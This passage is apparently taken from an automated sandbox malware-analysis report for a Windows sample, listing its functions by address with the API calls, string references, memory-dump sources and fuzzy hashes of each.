LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F78CF4,?,00F8F910), ref: 00F790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F79100

Strings

kernel32.dll, xrefs: 00F790E9
GetModuleHandleExW, xrefs: 00F790FA

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: bceb62b430e8e0dbbaf94f64eb59b4a1010aeead4137837b46dc25f3cf7521bb
Instruction ID: 2a694cec92ee336f2c1ae480ebcc20180a64929e3c7201356fb00c06e4e777ef
Opcode Fuzzy Hash: bceb62b430e8e0dbbaf94f64eb59b4a1010aeead4137837b46dc25f3cf7521bb
Instruction Fuzzy Hash: 63D0C230A10713CFC7209F35C80C29272D4AF00361B01C83A9486C2150E6B0C480EB91

Function 00F41714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F41718
__swprintf.LIBCMT ref: 00F41749

Strings

WIN_XPe, xrefs: 00F41788
%.3d, xrefs: 00F41723

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 633a85baac5d7b28bf43b631b4030ca9771ecd65c6d392c92974673c2029192d
Instruction ID: 78e1ab2c400f9a63b6b06286195a8d105f8396048639333710841eb90f017abf
Opcode Fuzzy Hash: 633a85baac5d7b28bf43b631b4030ca9771ecd65c6d392c92974673c2029192d
Instruction Fuzzy Hash: 88D01273844118FAC7109B909C88EF97B7CB708301F100552FD16A2040E22597D8FA21

Function 00F5717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
Instruction ID: 158a95af05a1b5e97087ae8d866e08d06dccf4bf99d2b924086e2cbc18f86f9c
Opcode Fuzzy Hash: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
Instruction Fuzzy Hash: 61C18B75A04216EFCB14DFA8D884EAEBBB5FF48311B108598ED05EB251D730ED85EB90

Function 00F7E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F7E0BE
CharLowerBuffW.USER32(?,?), ref: 00F7E101

Part of subcall function 00F7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F7E301
_memmove.LIBCMT ref: 00F7E314

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 48a4004533637523a81b34ec888db8e3837e66902788b6ecf547f948a7861c5d
Instruction ID: 424cb517b9c813089c458b4073bdeafc990bfbc9accc596532ba573ac29f3030
Opcode Fuzzy Hash: 48a4004533637523a81b34ec888db8e3837e66902788b6ecf547f948a7861c5d
Instruction Fuzzy Hash: A9C15C71A083019FC704DF28C840A6ABBE4FF89714F1489AEF8999B352D771E945DB82

Function 00F78093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F780C3
CoUninitialize.OLE32 ref: 00F780CE

Part of subcall function 00F5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5D5D4

VariantInit.OLEAUT32(?), ref: 00F780D9
VariantClear.OLEAUT32(?), ref: 00F783AA

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0f3c3b598b72908a92d8537ce9999c45c487071a8c7ca876a15e7393cb1774b4
Instruction ID: 8d0fa43f17e817e3d4e39de2fd1f07e3897eaa63a9ac2d7d2102861a51ae29b1
Opcode Fuzzy Hash: 0f3c3b598b72908a92d8537ce9999c45c487071a8c7ca876a15e7393cb1774b4
Instruction Fuzzy Hash: 46A19D756087019FCB00DF14C885B2AB7E4BF89364F44844DF99A9B3A2DB74ED05EB42

Function 00F57530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F92C7C,?), ref: 00F576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F92C7C,?), ref: 00F57702
CLSIDFromProgID.OLE32(?,?,00000000,00F8FB80,000000FF,?,00000000,00000800,00000000,?,00F92C7C,?), ref: 00F57727
_memcmp.LIBCMT ref: 00F57748

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 91792bcd4a3ff7feb79764114eb10141ecd9180fd433be2089b12f657e2d9692
Instruction ID: 4974d6f011896498fe8a68ccbc9f4c9b26b93f7a1a59a2d5483e1af8f46239a4
Opcode Fuzzy Hash: 91792bcd4a3ff7feb79764114eb10141ecd9180fd433be2089b12f657e2d9692
Instruction Fuzzy Hash: 86810E75A00209EFCB04DFA4D984EEEB7B9FF89315F204558F505AB250DB71AE0ADB60

Function 00F5687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F5688E
SysAllocString.OLEAUT32(00000000), ref: 00F56937
VariantCopy.OLEAUT32 ref: 00F56966
VariantClear.OLEAUT32(?), ref: 00F5698D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 7de5b2a073eb51d6ba2181c23a108efc8bf7b8092a1215bd11a45b22bf58a4ab
Instruction ID: 9096920a71ff7fb27168d2599540dae292ce884f08ce821b8d89a472be121bdd
Opcode Fuzzy Hash: 7de5b2a073eb51d6ba2181c23a108efc8bf7b8092a1215bd11a45b22bf58a4ab
Instruction Fuzzy Hash: 8A51D4757043019EDF20AF65D89173AB3E5AF45311FA0C81FEAA6DB292DE78D848B700

Function 00F897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(018CEA78,?), ref: 00F89863
ScreenToClient.USER32(00000002,00000002), ref: 00F89896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F89903

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 623b8a12ed278fb3f183f30514f78f69a4198308807748e725902dbff2728adb
Instruction ID: 0cb33e86d192ce647264548501babf60aff7a4c5968797df4106f802dc4b22a7
Opcode Fuzzy Hash: 623b8a12ed278fb3f183f30514f78f69a4198308807748e725902dbff2728adb
Instruction Fuzzy Hash: 15512C34A04209AFCF10DF64C985AFE7BB5FF45360F588259F8659B2A0D770AD81EB90

Function 00F59A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F59AD2
__itow.LIBCMT ref: 00F59B03

Part of subcall function 00F59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F59DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F59B6C
__itow.LIBCMT ref: 00F59BC3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 5d0ed38987efa3fdf5d25f3f70cb525189b842c658ed92c69e9d59ec2adf2a99
Instruction ID: a2c3b8f13cefc51cae3e25f7565b1f0d7b5e7d34e070874e924344dae5b379ba
Opcode Fuzzy Hash: 5d0ed38987efa3fdf5d25f3f70cb525189b842c658ed92c69e9d59ec2adf2a99
Instruction Fuzzy Hash: 00417270A04308ABEF15EF54DC45BEE7BB9EF84725F000059FE0567291DBB4AA48EB61

Function 00F769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00F769D1
WSAGetLastError.WSOCK32(00000000), ref: 00F769E1

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F76A45
WSAGetLastError.WSOCK32(00000000), ref: 00F76A51

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 6e6d68ec3af7e17506699c306de32af98d045ea4c361827efeb8131365edbf26
Instruction ID: 1af432f6b4932ea597d3a8dd7b90b57c3c9818293d6a1b3270bdf7e4973ac6cb
Opcode Fuzzy Hash: 6e6d68ec3af7e17506699c306de32af98d045ea4c361827efeb8131365edbf26
Instruction Fuzzy Hash: 21419F75740600AFEB60AF24CC86F7A77E49B04B14F44C158FA59AB3C3EAB89D01A791

Function 00F7641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F8F910), ref: 00F764A7
_strlen.LIBCMT ref: 00F764D9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 49047d734264bc3b10e911dde62122e51bac807b299a2db9978815c968747120
Instruction ID: c98dda1b120a5e89b7d96cb59281037fd24367dfa1273f2be1fd2138a8d011ad
Opcode Fuzzy Hash: 49047d734264bc3b10e911dde62122e51bac807b299a2db9978815c968747120
Instruction Fuzzy Hash: D541B475A00504AFCB14EB64EC85FAEB7A9AF44310F14815AF919D72D2EB38AD04FB51

Function 00F6B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F6B89E
GetLastError.KERNEL32(?,00000000), ref: 00F6B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F6B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F6B915

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 38c2ab55b2afc794d21fa6b212beda3712c4d9e4b0a78f1942b5e3cd82a42252
Instruction ID: 587320c034fe3691e7fa6306724dbdeec5df40691f70405499a4868d47e82896
Opcode Fuzzy Hash: 38c2ab55b2afc794d21fa6b212beda3712c4d9e4b0a78f1942b5e3cd82a42252
Instruction Fuzzy Hash: AB412B75A00514DFCB11EF15C984A59BBE1EF4A320F49C098EC4AAB3A2DB74FD41EB91

Function 00F88851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F888DE

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 372f58ca05ecc6c56cfe9e5869d996600ecb4f6c9669d944a9b17314e36661b2
Instruction ID: e0d2df272ac09a6e8181cc7d81bb495f1b14d97b1eb5fc1c6d88260b90228f54
Opcode Fuzzy Hash: 372f58ca05ecc6c56cfe9e5869d996600ecb4f6c9669d944a9b17314e36661b2
Instruction Fuzzy Hash: 6931A134A40109AEEF20BA58CC45FF977A5EB097A0FD44112FA15E61E1CB70E982B752

Function 00F8AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00F8AB60
GetWindowRect.USER32(?,?), ref: 00F8ABD6
PtInRect.USER32(?,?,00F8C014), ref: 00F8ABE6
MessageBeep.USER32(00000000), ref: 00F8AC57

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 99a340a79959ea9d1a4146ff60f378721a0edf54c248e999146aa6cb19652b1c
Instruction ID: c46965c3b039c8252f06be1a17d279061c4d66701691e15c231b35bad1225654
Opcode Fuzzy Hash: 99a340a79959ea9d1a4146ff60f378721a0edf54c248e999146aa6cb19652b1c
Instruction Fuzzy Hash: 61416E30A00519DFEB11EF58D884BE97BF5FF4A710F1881AAE8159B365D730E841EB92

Function 00F60AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F60B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00F60B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F60BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F60BFB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 52e8a361f490e453ec09ad63ba4e7124cdc16267dc69d6d17dcd175b7aa9b88c
Instruction ID: 06f4eaecc0b2e8d4adcfa79e69fd45352a351def295279338a312ba377c34164
Opcode Fuzzy Hash: 52e8a361f490e453ec09ad63ba4e7124cdc16267dc69d6d17dcd175b7aa9b88c
Instruction Fuzzy Hash: 39310930D402186EFB308A298C05BFBBBA5AB85329F28835AE591D11D1CB758945B755

Function 00F60C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00F60C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00F60C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00F60CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00F60D33

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 102285c85bb694be71297856441ac26d84e67538491dc8aeed9ed5c9eea1c08c
Instruction ID: f1e01f0504eb2bca5325f2c8a72306656a9a100057f89db98d06712b5fd68d7a
Opcode Fuzzy Hash: 102285c85bb694be71297856441ac26d84e67538491dc8aeed9ed5c9eea1c08c
Instruction Fuzzy Hash: 1B313530E402186EFF348B648C08BFFBBA6EB45330F28432AE481621D1CB399949F751

Function 00F361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F361FB
__isleadbyte_l.LIBCMT ref: 00F36229
